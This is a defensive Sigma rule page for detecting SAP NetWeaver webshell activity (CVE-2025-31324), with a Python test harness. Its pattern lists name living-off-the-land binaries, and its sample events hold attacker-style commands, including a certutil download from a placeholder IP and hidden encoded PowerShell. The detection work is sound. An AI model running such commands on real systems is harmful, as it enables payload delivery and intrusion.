Suspicious Child Process of SAP NetWeaver
Detects suspicious child processes spawned by SAP NetWeaver that could indicate exploitation of a vulnerability allowing arbitrary code execution via webshells, such as CVE-2025-31324. The rule fires when a process whose parent image or current working directory lies under the portal (irj) application's servlet_jsp work or root directories, where a dropped JSP webshell would be compiled and executed, launches cmd.exe, PowerShell, a script host or one of the other living-off-the-land binaries enumerated in selection_child.
Sigma rule
title: Suspicious Child Process of SAP NetWeaver
id: 5b304bcb-ac33-49d0-87af-fa1b3ca94333
status: experimental
description: |
    Detects suspicious child processes spawned by SAP NetWeaver that could indicate potential
    exploitation of a vulnerability that allows arbitrary code execution via webshells, such as CVE-2025-31324.
author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-04-28
tags:
    - attack.initial-access
    - attack.t1190
    - attack.persistence
    - attack.t1059.003
    - cve.2025-31324
    - detection.emerging-threats
references:
    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent_img:
        ParentImage|contains:
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work'
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root'
    selection_current_dict:
        CurrentDirectory|contains:
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work'
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\powershell_ise.exe'
            - '\pwsh.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\mshta.exe'
            - '\certutil.exe'
            - '\bitsadmin.exe'
            - '\python.exe'
    condition: (selection_parent_img or selection_current_dict) and selection_child
falsepositives:
    - Legitimate administrative activities such as software updates
level: medium
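To make the condition concrete, here is an added example (not part of the Sigma rule or this page) that re-implements the rule's selection logic in Python and runs it over a few constructed Sysmon-style process-creation events. The instance path D:\usr\sap\PRD\J00, the parent binaries jstart.exe and sapstartsrv.exe, the command lines and the IP address are illustrative assumptions, not observations from the referenced incidents.

```python
"""Added example, not part of the Sigma rule or this page: re-implements the rule's
selection logic and runs it over constructed Windows process-creation events
(Sysmon Event ID 1 style field names) so the match behaviour and its edge cases
can be checked offline."""

# Directory fragments from selection_parent_img / selection_current_dict.
WEBSHELL_DIRS = (
    r"\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work",
    r"\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root",
)

# Child images from selection_child.
SUSPICIOUS_CHILDREN = (
    r"\cmd.exe", r"\powershell.exe", r"\powershell_ise.exe", r"\pwsh.exe",
    r"\wscript.exe", r"\cscript.exe", r"\regsvr32.exe", r"\rundll32.exe",
    r"\mshta.exe", r"\certutil.exe", r"\bitsadmin.exe", r"\python.exe",
)


def _contains_any(value, needles):
    # Sigma string modifiers are case-insensitive by default, as are Windows paths.
    text = (value or "").lower()
    return any(needle.lower() in text for needle in needles)


def _endswith_any(value, needles):
    text = (value or "").lower()
    return any(text.endswith(needle.lower()) for needle in needles)


def matches_rule(event):
    """Evaluate: (selection_parent_img or selection_current_dict) and selection_child."""
    in_webshell_dir = (
        _contains_any(event.get("ParentImage"), WEBSHELL_DIRS)
        or _contains_any(event.get("CurrentDirectory"), WEBSHELL_DIRS)
    )
    return in_webshell_dir and _endswith_any(event.get("Image"), SUSPICIOUS_CHILDREN)


# Constructed events; SID "PRD", instance "J00" and the drive letter are assumptions.
IRJ_ROOT = r"D:\usr\sap\PRD\J00\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root"
IRJ_WORK = r"D:\usr\sap\PRD\J00\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work"

SAMPLE_EVENTS = [
    {   # JSP webshell runs a command: the Java server is the parent, but the
        # working directory is the servlet root, so selection_current_dict matches.
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c whoami",
        "ParentImage": r"D:\usr\sap\PRD\J00\exe\jstart.exe",
        "CurrentDirectory": IRJ_ROOT,
    },
    {   # Same pattern with a mixed-case path; the encoded payload is a harmless Start-Sleep.
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe",
        "CommandLine": "powershell -nop -w hidden -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwAA==",
        "ParentImage": r"D:\usr\sap\PRD\J00\exe\jstart.exe",
        "CurrentDirectory": IRJ_WORK.upper(),
    },
    {   # Binary dropped into irj\work and executed: matches via ParentImage instead.
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": "certutil -urlcache -split -f http://198.51.100.7/p.txt p.txt",
        "ParentImage": IRJ_WORK + r"\helper.exe",
        "CurrentDirectory": r"C:\Windows\Temp",
    },
    {   # Benign: SAP service spawning cmd.exe from the instance work directory.
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c sapcontrol -nr 00 -function GetProcessList",
        "ParentImage": r"D:\usr\sap\PRD\J00\exe\sapstartsrv.exe",
        "CurrentDirectory": r"D:\usr\sap\PRD\J00\work",
    },
    {   # Gap: a child not in selection_child is not caught even from the webshell dir.
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
        "ParentImage": r"D:\usr\sap\PRD\J00\exe\jstart.exe",
        "CurrentDirectory": IRJ_ROOT,
    },
]


def run_detection(events=SAMPLE_EVENTS):
    """Return the command lines of the events that fire the rule, in input order."""
    return [e["CommandLine"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    for hit in run_detection():
        print("ALERT:", hit)
```

Two points the sample events bring out. Sigma's contains and endswith modifiers are case-insensitive by default, so a backend that compiles them to case-sensitive comparisons will miss the mixed-case variant. And selection_child is a fixed list: a webshell that launches anything not on it (the notepad.exe case here, or a dropped binary) passes silently, so this rule should run alongside the webshell-creation rules listed under Related rules rather than on its own.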
Related rules
- Potential SAP NetWeaver Webshell Creation
- Potential SAP NetWeaver Webshell Creation - Linux
- Suspicious Child Process of SAP NetWeaver - Linux
- Potential SAP NetViewer Webshell Command Execution
- Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)